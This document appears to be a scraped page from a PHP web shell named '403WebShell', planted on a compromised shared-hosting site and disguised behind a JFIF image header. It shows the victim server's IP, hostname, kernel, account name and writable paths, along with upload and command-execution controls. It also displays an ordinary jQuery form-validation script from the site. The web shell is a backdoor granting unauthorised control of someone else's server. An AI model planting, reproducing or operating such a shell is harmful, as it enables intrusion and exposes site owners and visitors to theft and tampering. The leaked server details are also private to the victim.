����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.220.216.164
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/gle.gltechlimited.com/public/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/gle.gltechlimited.com/public/js/install.js
"use strict";
// Define your library strictly...
$(function() { 
          $("form:not(#updaterform)").on('submit', function () {
                      if($(this).valid()){
                        $('.preL').fadeIn('fast');
                        $('.preloader3').fadeIn('fast');
                        $('.container').css({ '-webkit-filter':'blur(5px)'});
                        $('body').attr('scroll','no');
                        $('body').css('overflow','hidden');
                      }
                  });
          });
 (function() {
        window.addEventListener('load', function() {
          // Fetch all the forms we want to apply custom Bootstrap validation styles to
          var forms = document.getElementsByClassName('needs-validation');
          // Loop over them and prevent submission
          var validation = Array.prototype.filter.call(forms, function(form) {
            form.addEventListener('submit', function(event) {
              if (form.checkValidity() === false) {
                event.preventDefault();
                event.stopPropagation();
              }
              form.classList.add('was-validated');
            }, false);
          });
        }, false);
      })();
$("#logo").on('change',function() {
  readURL1(this);
});
function readURL1(input) {
  if (input.files && input.files[0]) {
    var reader = new FileReader();
    reader.onload = function(e) {
      $('#logo-prev').attr('src', e.target.result);
    }
    reader.readAsDataURL(input.files[0]);
  }
}
 function readURL2(input) {
  if (input.files && input.files[0]) {
    var reader = new FileReader();
    reader.onload = function(e) {
      $('#fav-prev').attr('src', e.target.result);
    }
    reader.readAsDataURL(input.files[0]);
  }
}
$("#favicon").on('change',function() {
  readURL2(this);
});

Youez - 2016 - github.com/yon3zu
LinuXploit